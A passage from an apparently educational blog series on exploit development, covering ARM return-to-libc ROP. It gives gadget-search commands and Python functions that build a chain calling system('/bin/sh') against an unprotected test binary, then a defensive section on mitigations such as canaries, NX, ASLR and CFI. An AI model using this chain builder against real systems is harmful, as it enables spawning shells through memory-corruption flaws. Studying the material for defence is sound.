We need a gadget containing both r0 (first argument) and pc (jump target), without sp (which would corrupt our stack):

# Dump libc and search for useful POP patterns
objdump -d /lib/arm-linux-gnueabihf/libc.so.6 | grep "pop.*r0"

Or use tools like ROPgadget:

ROPgadget --binary /lib/arm-linux-gnueabihf/libc.so.6 | grep "pop {r0"
# Example output: 0x00018084 : pop {r0, r4, pc}

Thumb mode considerations:

As mentioned before, ARM processors can operate in ARM mode (32-bit instructions) or Thumb mode (16-bit instructions). When jumping to Thumb code, the least significant bit (LSB) of the address must be set to 1. Below I provide updates to the rop.py script shown earlier, and make sure it handles this automatically for system() and exit() addresses.

Extending rop.py for ARM:

The full rop.py script includes ARM support with automatic gadget finding:

def find_arm_gadget(libc_path, libc_base):
    """Find 'pop {r0, ..., pc}' gadget in libc."""
    objdump = check_output(["objdump", "-d", libc_path]).decode()

    candidates = []
    for m in re.finditer(r"^\s*([0-9a-f]+):.*pop\s*\{([^}]+)\}", objdump, re.M):
        offset, regs = m.groups()
        regs = [r.strip() for r in regs.split(",")]

        # Need r0 and pc, must not have sp (corrupts stack)
        if "r0" in regs and "pc" in regs and "sp" not in regs:
            candidates.append((int(offset, 16), regs))

    if not candidates:
        raise RuntimeError("No suitable ARM gadget found")

    # Prefer smallest gadget (fewer dummy values needed)
    candidates.sort(key=lambda x: len(x[1]))
    offset, regs = candidates[0]

    return libc_base + offset, regs


def build_arm_chain(target, libc):
    """
    ARM ret2libc: arguments in registers via ROP gadget.
    Chain: [gadget][values to pop into registers...]
    """
    gadget_addr, regs = find_arm_gadget(libc["path"], libc["base"])

    chain = to_le32(gadget_addr)
    for reg in regs:
        if reg == "r0":
            chain += to_le32(libc["binsh"])
        elif reg == "pc":
            chain += to_le32(libc["system"] | 1)  # Thumb bit
        elif reg == "lr":
            chain += to_le32(libc["exit"] | 1)  # Thumb bit
        else:
            chain += b"\x41\x41\x41\x41"  # Dummy for other regs

    return chain

The find_arm_gadget() function:

Disassembles libc using objdump
Searches for all pop {...} instructions
Filters for gadgets containing r0 and pc but not sp
Selects the smallest gadget (minimizes dummy values needed)

The build_arm_chain() function:

Finds a suitable gadget
Builds the chain by iterating through the registers in the gadget
Places appropriate values for each register (/bin/sh for r0, system() for pc)
Sets the LSB for Thumb mode addresses
Fills unused registers with dummy values

Using rop.py for ARM:

gcc -fno-stack-protector victim.c -o victim
./rop.py ./victim -a arm -s 100 -e 130

When executed:

Overflow overwrites return address with gadget address
Function returns to gadget
Gadget pops /bin/sh address into r0, dummy values into other registers, system() address into pc
Execution jumps to system() with r0 = "/bin/sh"
Shell spawns!

ARM ROP is a bit of a pain in the ass due to its register-based calling convention, but at least we now have some basic automation for it.

Defensive perspective

You now understand how to exploit binaries, at least at a basic level. Modern exploitation typically uses ROP or variants (JOP, SROP) because executable stacks are rare in production systems. However, understanding NOP sleds is pedagogically valuable and still relevant for embedded systems or legacy software.

Understanding exploitation techniques also greatly informs you how to defend against such attacks, for example, things you now know are:

Bounds checking: Always use safe string functions (strncpy, fgets, snprintf)
Stack canaries: Modenr compilers insert random values before return addresses; corruption is then detected before return
DEP/NX bit: Marks the stack and heap as non-executable
ASLR: Randomizes memory layout to make addresses unpredictable

Additionally, some other things we haven't explicitly covered are:

CFI (Control Flow Integrity): Ensures program control flow matches intended behavior
Static analysis: Tools like clang-tidy, cppcheck detect unsafe function usage
Fuzzing: Automated testing with malformed inputs to discover vulnerabilities

Although we haven't seen much of these ourselves, you'll find a ton of literature on these topics if you look them up.

Keep in mind though, no single mitigation is perfect. Hackers are surprisingly crafty and sometimes heavily funded and well-eqquiped (think nation states). Defense in depth (multiple layers) is always critical.

If you want to learn more about security and the fundamental principles, I would highly recommend Computer Security and the Internet: Tools and Jewels by Paul C. van Oorschot.

Next steps

If you made it to the end of this posts, congrats! We covered a lot of information; we explored shellcode development and two exploitation techniques (NOP sleds and ROP) for both x86 and ARM, we even developed some swanky Python scripts to automate some of these processes. In Part 4, we'll shift focus to heap-based vulnerabilities on ARM (and only ARM, because x86 is meh). Onwards!

References

The Shellcoder's Handbook - Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte
Hacking: The Art of Exploitation (2nd Edition) - Jon Erickson
Linux Syscall Reference
X86 Assembly/Interfacing with Linux - Wikibooks
Intel 64 and IA-32 Architectures Software Developer's Manual
Azeria Labs: ARM Assembly Basics
Exploit Database: x86 execve shellcode
Exploit Database: ARM execve shellcode
A Short Guide on ARM Exploitation - Aditya Gupta
ARM shellcode and exploit development - Andrea Sindoni (BSides Munich 2018)
Python ctypes documentation
Computer Security and the Internet: Tools and Jewels - Paul C. van Oorschot